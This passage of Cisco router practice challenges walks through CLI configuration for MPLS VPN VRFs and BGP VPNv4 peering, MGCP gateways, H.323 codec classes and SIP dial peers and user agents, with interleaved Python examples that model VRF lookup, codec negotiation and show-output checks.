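The outline of this challenge and the RD note above describe one mechanism from two sides: the PE keeps a separate routing table per VRF, so overlapping customer prefixes never collide on the PE, and the RD prepended to each prefix keeps them distinct when they are carried as VPNv4 routes between PEs. The Python below is an added example (my own code, not NetworkSims or Cisco software) that models both. encode_rd packs the two RD forms the page describes into their 8-byte wire encoding as defined in RFC 4364 (type 0: 2-byte AS plus 4-byte number; type 1: 4-byte IPv4 address plus 2-byte number), and a small PERouter class does per-VRF longest-prefix lookup for two VRFs that both hold 10.0.0.0/24. The second VRF "CustB", its RD 1:200, the interface names and the next hops are constructed for the example.

```python
"""Overlapping customer prefixes kept apart by VRF and Route Distinguisher.

Added example, not NetworkSims code. Models the PE side only: P routers,
as the page says, forward on labels and never see these tables.
RD wire format follows RFC 4364 section 4.2 (type 0: 2-byte AS + 4-byte
number; type 1: 4-byte IPv4 address + 2-byte number).
"""
import ipaddress
import struct


def encode_rd(rd):
    """'ASN:nn' or 'A.B.C.D:nn' -> the 8-byte Route Distinguisher."""
    admin, _, assigned = rd.rpartition(":")
    if not admin or not assigned.isdigit():
        raise ValueError(f"bad RD syntax: {rd!r}")
    n = int(assigned)
    if "." in admin:
        # Type 1: IP-address:nn, the nn part is only 16 bits wide.
        if n > 0xFFFF:
            raise ValueError("IP-address:nn form allows a 16-bit number")
        return struct.pack("!H4sH", 1, ipaddress.IPv4Address(admin).packed, n)
    asn = int(admin)
    if asn > 0xFFFF or n > 0xFFFFFFFF:
        raise ValueError("ASN:nn form needs a 16-bit AS and a 32-bit number")
    # Type 0: ASN:nn, 2-byte AS followed by a 32-bit assigned number.
    return struct.pack("!HHI", 0, asn, n)


class PERouter:
    """Per-VRF routing tables on a PE, keyed by the interface's VRF binding."""

    def __init__(self):
        self.vrfs = {}       # name -> {"rd": str, "routes": {network: next_hop}}
        self.iface_vrf = {}  # interface -> VRF name ('ip vrf forwarding')

    def ip_vrf(self, name, rd):
        """(config)# ip vrf NAME / (config-vrf)# rd RD"""
        encode_rd(rd)  # reject malformed RDs up front
        self.vrfs[name] = {"rd": rd, "routes": {}}

    def ip_vrf_forwarding(self, interface, name):
        """(config-if)# ip vrf forwarding NAME"""
        self.iface_vrf[interface] = name

    def add_route(self, vrf, prefix, next_hop):
        self.vrfs[vrf]["routes"][ipaddress.ip_network(prefix)] = next_hop

    def lookup(self, interface, dst):
        """Longest-prefix match, but only in the VRF bound to the ingress interface."""
        vrf = self.iface_vrf[interface]
        addr = ipaddress.ip_address(dst)
        best = None
        for net, nh in self.vrfs[vrf]["routes"].items():
            if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, nh)
        return None if best is None else best[1]

    def vpnv4_prefix(self, vrf, prefix):
        """RD:prefix, unique across VRFs even when the IPv4 prefix is not."""
        return f"{self.vrfs[vrf]['rd']}:{ipaddress.ip_network(prefix)}"


def demo():
    """Two VRFs carrying the same 10.0.0.0/24 to different next hops (constructed)."""
    pe = PERouter()
    pe.ip_vrf("Testing", "1:100")   # the page's VRF and RD
    pe.ip_vrf("CustB", "1:200")     # constructed second customer
    pe.ip_vrf_forwarding("Serial0", "Testing")
    pe.ip_vrf_forwarding("Serial1", "CustB")
    pe.add_route("Testing", "10.0.0.0/24", "138.199.17.2")
    pe.add_route("CustB", "10.0.0.0/24", "138.10.11.1")
    return pe


if __name__ == "__main__":
    pe = demo()
    print(pe.lookup("Serial0", "10.0.0.7"), pe.lookup("Serial1", "10.0.0.7"))
    print(pe.vpnv4_prefix("Testing", "10.0.0.0/24"), encode_rd("1:100").hex())
```

The same destination address resolves to a different next hop depending only on which interface (and therefore which VRF) the packet arrived on, and the two VPNv4 prefixes differ in their RD even though the IPv4 part is identical; that is the property BGP relies on when the next challenge carries these routes PE to PE.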


Cisco Router Challenge 230


Outline
The previous challenge involved the configuration of the VRF on the PE routers, and this
next challenge sets up BGP PE-PE Routing on PE Routers, which is required to transport the
routes over the backbone.
Objectives
The objectives of this challenge are to:

Configure VRF.
Configure RD (which is used to make a unique IP address).
Configure import and export policy (RT).
Associate VRF with an interface.
Configure BGP PE-PE on a PE device.

Commands
> enable
# config t
(config)# ip cef
(config)# int loopback5
(config-if)# ip address 138.199.17.2 255.255.255.248
(config-if)# ip vrf forwarding Testing
(config-if)# exit
(config)# ip vrf Testing
(config-vrf)# rd 1:100
(config-vrf)# route-target both 1:100
(config)# int s0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config-if)# ip vrf forwarding Testing
(config-if)# exit
(config)# router bgp 1
(config-router)# neighbor 138.199.17.1 remote-as 1
(config-router)# neighbor 138.199.17.1 update-source loopback5
(config-router)# address-family vpnv4
(config-router-af)# neighbor 1.2.3.4 send-community extended
(config-router-af)# neighbor 1.2.3.4 activate

Example
> enable
# config t
(config)# ip cef
(config)# int loopback5
(config-if)# ip address 138.199.17.2 255.255.255.248
(config-if)# ip vrf forwarding Testing
(config-if)# exit


(config)# ip vrf ?
WORD VPN Routing/Forwarding instance name
(config)# ip vrf Testing
(config-vrf)# ?
IP VPN Routing/Forwarding instance configuration commands:
  bgp           Commands pertaining to BGP
  context       Associate SNMP context with this vrf
  default       Set a command to its defaults
  description   VRF specific description
  exit          Exit from VRF configuration mode
  maximum       Set a limit
  mdt           Backbone Multicast Distribution Tree
  no            Negate a command or set its defaults
  rd            Specify Route Distinguisher
  route-target  Specify Target VPN Extended Communities
  vpn           Configure VPN ID as specified in rfc2685
(config-vrf)# rd 1:100
(config-vrf)# rd ?
  ASN:nn or IP-address:nn  VPN Route Distinguisher
(config-vrf)# route-target ?
  ASN:nn or IP-address:nn  Target VPN Extended Community
  both                     Both import and export Target-VPN community
  export                   Export Target-VPN community
  import                   Import Target-VPN community
(config-vrf)# route-target both ?
  ASN:nn or IP-address:nn  Target VPN Extended Community
(config-vrf)# route-target both 1:100
(config)# int s0
(config-if)# ip address 138.199.17.1 255.255.255.248
(config-if)# ip vrf ?
  forwarding  Configure forwarding table
  receive     Add Interface Address into VRF Table
  sitemap     Configure route-map for routes received from this site
(config-if)# ip vrf forwarding ?
  WORD  Table name
(config-if)# ip vrf forwarding Testing
(config-if)# exit
(config-if)# exit
(config)# router bgp 1
(config-router)# neighbor 138.199.17.1 remote-as 1
(config-router)# neighbor 138.199.17.1 update-source loopback5
(config-router)# address-family vpnv4
(config-router-af)# ?
Router Address Family configuration commands:
  auto-summary         Enable automatic network number summarization
  autonomous-system    Specify AS number for Address Family
  default              Set a command to its defaults
  default-information  Control distribution of default information
  default-metric       Set metric of redistributed routes
  distance             Define an administrative distance
  distribute-list      Filter networks in routing updates
  eigrp                EIGRP specific commands
  exit-address-family  Exit from Address Family configuration mode
  help                 Description of the interactive help system
  maximum-paths        Forward packets over multiple paths
  metric               Modify EIGRP routing metrics and parameters
  network              Enable routing on an IP network
  no                   Negate a command or set its defaults
  offset-list          Add or subtract offset from RIP metrics
  redistribute         Redistribute information from another routing protocol
  variance             Control load balancing variance
(config-router-af)# neighbor ?
  A.B.C.D     Neighbor address
  WORD        Neighbor tag
  X:X:X:X::X  Neighbor IPv6 address
(config-router-af)# neighbor 1.2.3.4 ?
  activate                Enable the Address Family for this Neighbor
  advertise-map           specify route-map for conditional advertisement
  advertisement-interval  Minimum interval between sending BGP routing updates
  allowas-in              Accept as-path with my AS present in it
  description             Neighbor specific description
  distribute-list         Filter updates to/from this neighbor
  dmzlink-bw              Propagate the DMZ link bandwidth
  ebgp-multihop           Allow EBGP neighbors not on directly connected
                          networks
  filter-list             Establish BGP filters
  local-as                Specify a local-as number
  maximum-prefix          Maximum number of prefix accept from this peer
  next-hop-self           Disable the next hop calculation for this neighbor
  password                Set a password
  peer-group              Member of the peer-group
  prefix-list             Filter updates to/from this neighbor
  remote-as               Specify a BGP neighbor
  remove-private-AS       Remove private AS number from outbound updates
  route-map               Apply route map to neighbor
  route-reflector-client  Configure a neighbor as Route Reflector client
  send-community          Send Community attribute to this neighbor
  shutdown                Administratively shut down this neighbor
  soft-reconfiguration    Per neighbor soft reconfiguration
  timers                  BGP per neighbor timers
  unsuppress-map          Route-map to selectively unsuppress suppressed routes
  update-source           Source of routing updates
  version                 Set the BGP version to match a neighbor
  weight                  Set default weight for routes from this neighbor
(config-router-af)# neighbor 1.2.3.4 send ?
  both      Send Standard and Extended Community attributes
  extended  Send Extended Community attribute
  standard  Send Standard Community attribute
  <cr>
(config-router-af)# neighbor 1.2.3.4 send-community extended
(config-router-af)# neighbor 1.2.3.4 activate


25 CCNP (Voice Gateway)


Cisco Gateway and Gatekeeper
Gateway and Gatekeeper Introduction
The most up-to-date version of this test is at:
http://networksims.com/ga01.html

Cisco Router Challenge 231


Outline
This challenge involves basic MGCP gateway configuration.
Objectives
The objectives of this challenge are to:

Define MGCP Gateway configuration

Commands
> enable
# config t
(config)# mgcp
(config)# mgcp call-agent 192.168.1.1
(config)# ccm-manager mgcp

If the MGCP configuration is to be loaded from CallManager, the IP address of the TFTP
server (such as CallManager) must be defined, such as:
(config)# ccm-manager config
(config)# ccm-manager config server 192.168.1.2

And then to bind MGCP to the voice ports:
(config)# dial-peer voice 100 pots
(config-dial-peer)# application MGCPAPP
(config-dial-peer)# port 1/0/1

And there needs to be at least one dial peer in case CallManager is not available:
(config)# dial-peer voice 200 pots
(config-dial-peer)# destination-pattern 123..
(config-dial-peer)# incoming called-number .
(config-dial-peer)# port 1/0/1
(config-dial-peer)# exit

Next the IP address that CallManager communicates with is defined:
(config)# int loopback15
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# exit
(config)# mgcp bind control source-interface loopback15

and to enable DTMF-relay:
(config)# mgcp dtmf-relay voip code all mode out-of-band

and to enable the MGCP gateway to use the fallback mode:
(config)# ccm-manager fallback-mgcp
(config)# ccm-manager redundant-host 192.168.1.1

and finally the details can be shown:
(config)# exit
# sh ccm-manager
# sh mgcp

Example
> enable
# config t
(config)# mgcp
(config)# mgcp call-agent 192.168.1.1
(config)# ccm-manager mgcp
(config)# ccm-manager config server 192.168.1.2
(config)# ccm-manager config
(config)# dial-peer voice 100 pots
(config-dial-peer)# application mgcpapp
(config-dial-peer)# port 1/0/1
(config-dial-peer)# exit
(config)# dial-peer voice 200 pots
(config-dial-peer)# destination-pattern 123..
(config-dial-peer)# incoming called-number .
(config-dial-peer)# port 1/0/1
(config-dial-peer)# exit
(config)# int loopback15
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# exit
(config)# mgcp bind ?
  control  bind only MGCP control packets
  media    bind only media packets
(config)# mgcp bind control ?
  source-interface  Specify interface for source address of MGCP packets
(config)# mgcp bind control source-interface ?
  Async              Async interface
  BVI                Bridge-Group Virtual Interface
  CTunnel            CTunnel interface
  Dialer             Dialer interface
  FastEthernet       FastEthernet IEEE 802.3
  Loopback           Loopback interface
  MFR                Multilink Frame Relay bundle interface
  Multilink          Multilink-group interface
  Null               Null interface
  Serial             Serial
  Tunnel             Tunnel interface
  Vif                PGM Multicast Host interface
  Virtual-Template   Virtual Template interface
  Virtual-TokenRing  Virtual TokenRing
(config)# mgcp bind control source-interface loopback15
(config)# mg dt ?
  voaal2  Enable mgcp dtmf-relay for VoAAL2 Calls (using Annex K Type3
          packets).
  voip    Enable mgcp dtmf-relay for VoIP Calls
(config)# mg dt voi ?
  codec  Configure mgcp dtmf-relay codec
(config)# mg dt voi c ?
  all           Enable mgcp dtmf-relay for all codec
  low-bit-rate  Enable mgcp dtmf-relay for low-bit-rate codec
(config)# mg dt voi c a ?
  mode  Set mgcp dtmf-relay mode
(config)# mg dt voi c a m ?
  cisco        Set mgcp dtmf-relay mode to be cisco
  nse          Set mgcp dtmf-relay mode to be nse
  nte-ca       Set mgcp dtmf-relay mode to be nte-ca
  nte-gw       Set mgcp dtmf-relay mode to be nte-gw
  out-of-band  Set mgcp dtmf-relay mode to be out-of-band
(config)# mgcp dtmf-relay voip code all mode out-of-band
(config)# ccm ?
  application              application specific
  config                   MGCP download configuration
  download-tones           Enable Tone Download from TFTP server
  fallback-mgcp            Enable Fallback from MGCP to H.323 mode if no Call
                           Manager is available
  fax                      Enable fax protocol for MGCP
  mgcp                     Enable Call Manager Application MGCP mode
  music-on-hold            Enable multicast Music-on-hold
  redundant-host           Redundant host list
  sccp                     Enable Call Manager Application SCCP mode
  shut-backhaul-interfaces Shutdown the backhauled interfaces if no Call
                           Manager is available
  switchback               Configure switchback options for rehoming to
(config)# ccm-manager fallback-mgcp
(config)# ccm-manager redundant-host ?
  WORD  IP address or Domain name of backup host number 1
(config)# ccm-manager redundant-host 1.2.3.4 ?
  WORD  IP address or Domain name of backup host number 2
  <cr>
(config)# ccm-manager redundant-host 192.168.1.1
(config)# exit
# sh ccm-manager
MGCP Domain Name: Router
Priority        Status                   Host
============================================================
Primary         Down                     1.2.3.4
First Backup    None
Second Backup   None

Current active Call Manager:    None
Backhaul/Redundant link port:   2428
Failover Interval:              30 seconds
Keepalive Interval:             15 seconds
Last keepalive sent:            23:59:59 UTC Feb 28 1993 (elapsed time: 00:05:3)
Last MGCP traffic time:         00:02:21 UTC Mar 1 1993 (elapsed time: 00:03:10)
Last failover time:             None
Last switchback time:           None
Switchback mode:                Graceful
MGCP Fallback mode:             Enabled/OFF
Last MGCP Fallback start time:  None
Last MGCP Fallback end time:    None

Backhaul/Redundant link is down

Configuration Auto-Download Information
=======================================
No configurations downloaded
Current state: Waiting for commands
Configuration Download statistics:
        Download Attempted           : 1
        Download Successful          : 0
        Download Failed              : 1
        Configuration Attempted      : 0
        Configuration Successful     : 0
        Configuration Failed(Parsing): 0
        Configuration Failed(config) : 0
Last config download command:
Configuration Error History:
TFTP File download failed

FAX mode: cisco


Router# sh mg
MGCP Admin State ACTIVE, Oper State ACTIVE - Cause Code NONE
MGCP call-agent: 1.2.3.4 Initial protocol service is MGCP 0.1
MGCP block-newcalls DISABLED
MGCP validate domain name DISABLED
MGCP send SGCP RSIP: forced/restart/graceful/disconnected DISABLED
MGCP quarantine mode discard/step
MGCP quarantine of persistent events is ENABLED
MGCP dtmf-relay for VoIP disabled for all codec types
MGCP dtmf-relay for VoAAL2 disabled for all codec types
MGCP voip modem passthrough disabled
MGCP voaal2 modem passthrough disabled
MGCP voip modem relay: Disabled.
MGCP TSE payload: 100
MGCP T.38 Named Signalling Event (NSE) response timer: 200
MGCP Network (IP/AAL2) Continuity Test timer: 200
MGCP 'RTP stream loss' timer: 5
MGCP request timeout 500
MGCP maximum exponential request timeout 4000
MGCP gateway port: 2427, MGCP maximum waiting delay 3000

MGCP restart delay 0, MGCP vad DISABLED
MGCP rtrcac DISABLED
MGCP system resource check DISABLED
MGCP xpc-codec: DISABLED, MGCP persistent hookflash: DISABLED
MGCP persistent offhook: ENABLED, MGCP persistent onhook: DISABLED
MGCP piggyback msg ENABLED, MGCP endpoint offset DISABLED
MGCP simple-sdp DISABLED
MGCP undotted-notation DISABLED
MGCP codec type g711ulaw, MGCP packetization period 20
MGCP JB threshold lwm 30, MGCP JB threshold hwm 150
MGCP LAT threshold lwm 150, MGCP LAT threshold hwm 300
MGCP PL threshold lwm 1000, MGCP PL threshold hwm 10000
MGCP CL threshold lwm 1000, MGCP CL threshold hwm 10000
MGCP playout mode is adaptive 60, 40, 200 in msec
MGCP Fax Playout Buffer is 300 in msec
MGCP media (RTP) dscp: ef, MGCP signaling dscp: af31
MGCP default package: line-package
MGCP supported packages: gm-package dtmf-package trunk-package line-package
                         hs-package atm-package ms-package dt-package res-package
                         mt-package fxr-package
MGCP Digit Map matching order: shortest match
SGCP Digit Map matching order: always left-to-right
MGCP VoAAL2 ignore-lco-codec DISABLED
MGCP T.38 Fax is ENABLED
MGCP T.38 Fax ECM is ENABLED
MGCP T.38 Fax NSF Override is DISABLED
MGCP T.38 Fax Low Speed Redundancy: 0
MGCP T.38 Fax High Speed Redundancy: 0
MGCP control bind :DISABLED
MGCP media bind :DISABLED
MGCP Upspeed payload type for G711ulaw: 0, G711alaw: 8
MGCP Dynamic payload type for G.726-16K codec
MGCP Dynamic payload type for G.726-24K codec
MGCP Dynamic payload type for G.Clear codec
MGCP Guaranteed scheduler time is disabled

Cisco Gateway and Gatekeeper


MGCP Gateway
The most up-to-date version of this test is at:
http://networksims.com/ga02.html

Cisco Router Challenge 232


Outline
This challenge involves H.323 configuration.
Objectives
The objectives of this challenge are to:


Define H.323 voice class configuration.

Commands
> enable
# config t
(config)# voice class codec 44
(config-class)# ?
(config-class)# codec preference 1 g728
(config-class)# codec preference 2 g729r8
(config-class)# codec preference 3 g726r32
(config-class)# exit
(config)# dial-peer voice 3 voip
(config-dial-peer)# destination-pattern .T
(config-dial-peer)# session target ipv4:88.10.11.12
(config-dial-peer)# preference 1
(config-dial-peer)# voice-class code 44

Example
> enable
# config t
(config)# voice class codec 44
(config-class)# ?
VOICECLASS configuration commands:
  codec  Set class codec parameters
  exit   Exit from voice class configuration mode
  help   Description of the interactive help system
  no     Negate a command or set its defaults
(config-class)# codec ?
preference Set priority order for using this codec
(config-class)# codec preference ?
<1-14> Priority order (1 = Highest)
(config-class)# codec preference 1 ?
clear-channel Clear Channel 64000 bps (No voice capabilities: data transport only)
g711alaw G.711 A Law 64000 bps
g711ulaw G.711 u Law 64000 bps
g723ar53 G.723.1 ANNEX-A 5300 bps (contains built-in vad that cannot be disabled)
g723ar63 G.723.1 ANNEX-A 6300 bps (contains built-in vad that cannot be disabled)
g723r53 G.723.1 5300 bps
g723r63 G.723.1 6300 bps
g726r16 G.726 16000 bps
g726r24 G.726 24000 bps
g726r32 G.726 32000 bps
g728 G.728 16000 bps
g729br8 G.729 ANNEX-B 8000 bps (contains built-in vad that cannot be disabled)
g729r8 G.729 8000 bps
(config-class)# codec preference 1 g728
(config-class)# codec preference 2 g729r8
(config-class)# codec preference 3 g726r32
(config-class)# exit
(config)# dial-peer voice 3 voip
(config-dial-peer)# destination-pattern .T
(config-dial-peer)# session target ipv4:88.10.11.12
(config-dial-peer)# preference 1
(config-dial-peer)# voice-class codec 44
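
The voice class above only lists codecs in priority order; which codec a call actually ends up with depends on what the remote peer can also do. The following Python is an added example, not part of the NetworkSims challenge or of Cisco IOS: it parses a `codec preference` list the way the CLI constrains it (`<1-14>`, one codec per slot, codec names taken from the `codec preference 1 ?` help output) and then selects the highest-preference codec the peer also offers. The bit rates are the ones shown in the help output; the peer's offered list is a constructed sample.

```python
# Added example (not from the NetworkSims page or Cisco IOS): model how a
# "voice class codec" preference list selects a codec against the codecs a
# remote peer offers. Bit rates come from the "codec preference 1 ?" help text.

CODEC_BPS = {
    "clear-channel": 64000,
    "g711alaw": 64000,
    "g711ulaw": 64000,
    "g723ar53": 5300,
    "g723ar63": 6300,
    "g723r53": 5300,
    "g723r63": 6300,
    "g726r16": 16000,
    "g726r24": 24000,
    "g726r32": 32000,
    "g728": 16000,
    "g729br8": 8000,
    "g729r8": 8000,
}


def parse_voice_class(lines):
    """Return {preference: codec} from 'codec preference N NAME' lines.

    Mirrors the CLI constraints: N must be in <1-14>, the codec must be one
    the help output lists, and each preference slot holds one codec.
    Raises ValueError on anything the CLI would reject.
    """
    prefs = {}
    for raw in lines:
        parts = raw.strip().split()
        if parts[:2] != ["codec", "preference"]:
            continue  # 'voice class codec 44' and other lines are not preferences
        if len(parts) != 4:
            raise ValueError(f"malformed line: {raw!r}")
        n, codec = int(parts[2]), parts[3]
        if not 1 <= n <= 14:
            raise ValueError(f"preference {n} outside <1-14>")
        if codec not in CODEC_BPS:
            raise ValueError(f"unknown codec {codec}")
        if n in prefs:
            raise ValueError(f"duplicate preference {n}")
        prefs[n] = codec
    return prefs


def negotiate(prefs, offered):
    """Pick the first codec in local preference order that the peer offers.

    Returns (codec, bps), or None when the two sides share no codec, which
    is the case where the call fails to set up for lack of a common codec.
    """
    offered = set(offered)
    for n in sorted(prefs):
        if prefs[n] in offered:
            return prefs[n], CODEC_BPS[prefs[n]]
    return None


# Constructed sample: the voice class configured in the challenge.
VOICE_CLASS_44 = [
    "voice class codec 44",
    " codec preference 1 g728",
    " codec preference 2 g729r8",
    " codec preference 3 g726r32",
]

if __name__ == "__main__":
    prefs = parse_voice_class(VOICE_CLASS_44)
    # Constructed sample of what a remote peer might offer.
    print(negotiate(prefs, ["g711ulaw", "g726r32", "g729r8"]))
```

With the constructed peer offer the result is `g729r8` at 8000 bps: `g728` is preferred locally but absent on the peer, so the second slot wins; a peer offering only `g711ulaw` yields no common codec.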

Cisco Router Challenge 233


Outline
This challenge involves Voice Service VoIP Configuration.
Objectives
The objectives of this challenge are to:

Define Voice Service.

Commands
> enable
# config t
(config)# voice service voip
(conf-voi-serv)# allow-connections h323 to h323
(conf-voi-serv)# h323
(conf-serv-h323)# no h225 timeout keepalive
(conf-serv-h323)# call service stop
(conf-serv-h323)# call start slow

Example
> enable
# config t
(config)# voice service voip
(conf-voi-serv)# ?
VOICE SERVICE configuration commands:
allow-conn Define connections
cause-code Sets the internal cause code for SIP and H323
default Set a command to its defaults
exit Exit from voice service configuration mode
fax Global fax commands
h323 Global H.323 configuration commands
modem Global modem commands
no Negate a command or set its defaults
shutdown Stop VoIP services gracefully without dropping active calls
signaling Global setting for signaling payload handling
sip SIP configuration commands
(conf-voi-serv)# allow-connections h323 to h323
(conf-voi-serv)# h323
(conf-serv-h323)# ?
VOICE SERVICE VOIP H323 configuration commands:
bearercap-ie Specify bearercap_ie coding
call Global setting for H.323 Calls
default Set a command to its defaults
exit Exit from voice service voip h323 configuration mode
h225 TCP H225 call signalling channel
h245 H245 Signalling
h450 H450 parameter configuration
no Negate a command or set its defaults
ras Gateway RAS configuration
session H323 Voice Protocol session config
(conf-serv-h323)# no ?
bearercap-ie Specify bearercap_ie coding
call Global setting for H.323 Calls
h225 TCP H225 call signalling channel
h245 H245 Signalling
h450 H450 parameter configuration
ras Gateway RAS configuration
session H323 Voice Protocol session config
(conf-serv-h323)# no h225 ?
signal Specify signaling options
timeout Specify timeout for maintaining connections
(conf-serv-h323)# no h225 t ?
keepalive KEEPALIVE timeout
setup SETUP timeout
tcp H225 CSA connection type
(conf-serv-h323)# no h225 timeout keepalive
(conf-serv-h323)# call ?
service H.323 service configuration
start Global setting for H.323 Call start procedures: Fast/Slow Start (Default: Fast Start)
(conf-serv-h323)# call service ?
stop Stop H.323 service
(conf-serv-h323)# call service stop
(conf-serv-h323)# call start ?
fast Use Fast Start procedures to initiate call
slow Use Slow Start procedures to initiate call
(conf-serv-h323)# call start slow

Cisco Gateway and Gatekeeper


H.323
The most up-to-date version of this test is at:
http://networksims.com/ga03.html

Cisco Router Challenge 234


Outline
This challenge involves SIP Dial Peer configuration.


Objectives
The objectives of this challenge are to:

Define SIP dial peers.

Commands
> enable
# config t
(config)# dial-peer voice 1111 voip
(config-dial-peer)# session target ipv4:10.1.1.1
(config-dial-peer)# session protocol sipv2
(config-dial-peer)# session transport tcp
(config-dial-peer)# exit
(config)# dial-peer voice 1112 voip
(config-dial-peer)# session target ipv4:10.1.1.1
(config-dial-peer)# session protocol sipv2
(config-dial-peer)# voice-class sip transport switch udp tcp
(config-dial-peer)# destination-pattern 99..

Example
> enable
# config t
(config)# dial-peer voice 1111 voip
(config-dial-peer)# session ?
protocol The session protocol to be used in getting to this peer
target The session target for this peer
transport The transport layer protocol used for this peer
(config-dial-peer)# session target ?
WORD A string specifying the session target
(config-dial-peer)# session target ipv4:10.1.1.1
(config-dial-peer)# sess protocol ?
cisco Cisco Session Protocol
multicast Multicast Session Protocol(voice conferencing)
sipv2 IETF Session Initiation Protocol
(config-dial-peer)# session protocol sipv2
(config-dial-peer)# sess transport ?
system defer to voice service voip session transport
tcp Transport Layer Protocol - TCP
udp Transport Layer Protocol - UDP
(config-dial-peer)# session transport tcp
(config-dial-peer)# exit
(config)# dial-peer voice 1112 voip
(config-dial-peer)# session target ipv4:10.1.1.1
(config-dial-peer)# session protocol sipv2
(config-dial-peer)# voice-class sip transport switch udp tcp
(config-dial-peer)# destination-pattern 99..

By default UDP is used as the transport protocol. In the first dial peer the command:
(config-dial-peer)# session transport tcp

is used so that SIP switches from UDP to TCP when the voice packets get to within 200
bytes of the MTU (Maximum Transmission Unit), and thus avoids any fragmentation of the
UDP segments.
The command:
(config-dial-peer)# voice-class sip transport switch udp tcp

is used to enable switching between UDP and TCP transport for SIP messages in a specific
dial peer.

Cisco Router Challenge 235


Outline
This challenge involves SIP UA configuration for the registration of analog phones with a
redundant server. In this case the maximum number of hops for SIP is defined.
Objectives
The objectives of this challenge are to:

Allow a gateway to register E.164 numbers on non-SIP phones with a registrar. For
this the registrar command is used.
Specify the IP address of the SIP server (using sip-server).
Define maximum SIP hops (using max-forwards). This value can range between 1
and 70 (the default is 70).
Disable SIP UA listening for UDP messages on port 5060 (no transport udp), so that it
listens only for TCP messages.
Show the configured E.164 phone number registration (using show sip-ua register
status).
Verify the SIP UA configuration (using show sip-ua status).

Commands
> enable
# config t
(config)# sip-ua
(config-sip-ua)# registrar ipv4:192.168.1.1 tcp
(config-sip-ua)# registrar ipv4:192.168.1.2 tcp secondary
(config-sip-ua)# sip-server ipv4:192.168.1.3
(config-sip-ua)# no transport udp
(config-sip-ua)# max-forwards 15
(config-sip-ua)# exit
(config)# exit
# sh sip-ua status
# show sip-ua register status

Example
> enable
# config t
(config)# sip-ua
(config-sip-ua)# registrar ?
WORD Registrar Server address
(config-sip-ua)# registrar ipv4:192.168.1.1 tcp
(config-sip-ua)# registrar ipv4:192.168.1.2 tcp secondary
(config-sip-ua)# sip ?
WORD Specify the Server address
(config-sip-ua)# sip-server ipv4:192.168.1.3
(config-sip-ua)# no ?
aaa sip-ua AAA related configuration
authentication Digest Authentication Configuration
calling-info Specify treatment of calling information
disable-early-media Disable early-media cut through
max-forwards Change number of max-forwards for SIP Methods
mwi-server Configure a mwi Server
nat Enable NAT(Network Address Traversal) settings for the SIP User Agent
notify SIP Signaling Notify Configuration
offer Configure settings for Offers made from the Gateway
reason-header Configure settings for supporting SIP Reason Header
redirection Enable call redirection (3xx) handling
registrar Configure SIP registrar VoIP Interface
remote-party-id Enable Remote-Party-ID support in SIP User Agent
retry Change default retries for each SIP Method
set Sets the PSTN cause to SIP status code (and vice versa) and sets the PSTN cause to SIP requests
sip-server Configure a SIP Server Interface
srv DNS SRV Query Type
suspend-resume Enable support for ISDN SUSPEND/RESUME
timers SIP Signaling Timers Configuration
transport Enable SIP UA transport for TCP/UDP
(config-sip-ua)# no tr ?
tcp Disable SIP User Agent in TCP Mode
udp Disable SIP User Agent in UDP Mode
(config-sip-ua)# no transport udp
(config-sip-ua)# max-forwards ?
<1-70> Number of max-forwards
(config-sip-ua)# max-forwards 15
(config-sip-ua)# exit
(config)# exit
# sh sip-ua status
SIP User Agent Status
SIP User Agent for UDP : DISABLED
SIP User Agent for TCP : ENABLED
SIP User Agent bind status(signaling): DISABLED
SIP User Agent bind status(media): DISABLED
SIP early-media for 180 responses with SDP: ENABLED
SIP max-forwards : 70
SIP DNS SRV version: 2 (rfc 2782)
NAT Settings for the SIP-UA
Role in SDP: NONE
Check media source packets: DISABLED
Maximum duration for a telephone-event in NOTIFYs: 2000 ms
SIP support for ISDN SUSPEND/RESUME: ENABLED
Redirection (3xx) message handling: ENABLED
Reason Header will override Response/Request Codes: DISABLED


SDP application configuration:
Version line (v=) required
Owner line (o=) required
Timespec line (t=) required
Media supported: audio image
Network types supported: IN
Address types supported: IP4
Transport types supported: RTP/AVP udptl
# show sip-ua register status
Line   peer   expires (sec)   registered
===========================================
4101   20001  120             yes
4102   20005  120             yes
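
The two show commands are the verification step of this challenge, and in practice they are worth comparing against what was configured rather than just read. The Python below is an added example, not code from NetworkSims or Cisco: it parses the `show sip-ua status` and `show sip-ua register status` output reproduced above (embedded here as constructed sample text) and compares the listener state and `max-forwards` value against the intended settings, then lists any line that failed to register. Note that the sample output on the page reports `SIP max-forwards : 70` although `max-forwards 15` was configured, so the check reports that one difference; the field names are the ones in the output above.

```python
# Added example (not from the NetworkSims page or Cisco IOS): verify the
# running SIP UA state reported by 'show sip-ua status' / 'show sip-ua
# register status' against the settings the challenge configured.

# Constructed sample: the 'show sip-ua status' output reproduced on the page.
SHOW_SIP_UA_STATUS = """\
SIP User Agent Status
SIP User Agent for UDP : DISABLED
SIP User Agent for TCP : ENABLED
SIP User Agent bind status(signaling): DISABLED
SIP User Agent bind status(media): DISABLED
SIP early-media for 180 responses with SDP: ENABLED
SIP max-forwards : 70
SIP DNS SRV version: 2 (rfc 2782)
NAT Settings for the SIP-UA
Role in SDP: NONE
Redirection (3xx) message handling: ENABLED
"""

# Constructed sample: the 'show sip-ua register status' table from the page.
SHOW_SIP_UA_REGISTER_STATUS = """\
Line   peer   expires (sec)   registered
===========================================
4101   20001  120             yes
4102   20005  120             yes
"""

# What the challenge configured: no transport udp, TCP left on, max-forwards 15.
INTENDED = {"udp": False, "tcp": True, "max_forwards": 15}


def parse_status(text):
    """Turn 'key : value' lines into a dict; lines without a colon are
    section headings and are skipped. Keys are stripped of surrounding space."""
    state = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        state[key.strip()] = value.strip()
    return state


def parse_register_status(text):
    """Parse the register table into rows; header and ruler lines are
    recognised by not starting with a numeric line id."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit():
            continue
        line_id, peer, expires, registered = parts
        rows.append({"line": line_id, "peer": peer,
                     "expires": int(expires), "registered": registered == "yes"})
    return rows


def check_sip_ua(status, intended):
    """Return a list of findings where running state differs from intent
    (empty list means the device matches the configuration)."""
    findings = []
    want_udp = "ENABLED" if intended["udp"] else "DISABLED"
    want_tcp = "ENABLED" if intended["tcp"] else "DISABLED"
    if status.get("SIP User Agent for UDP") != want_udp:
        findings.append("UDP listener state does not match configuration")
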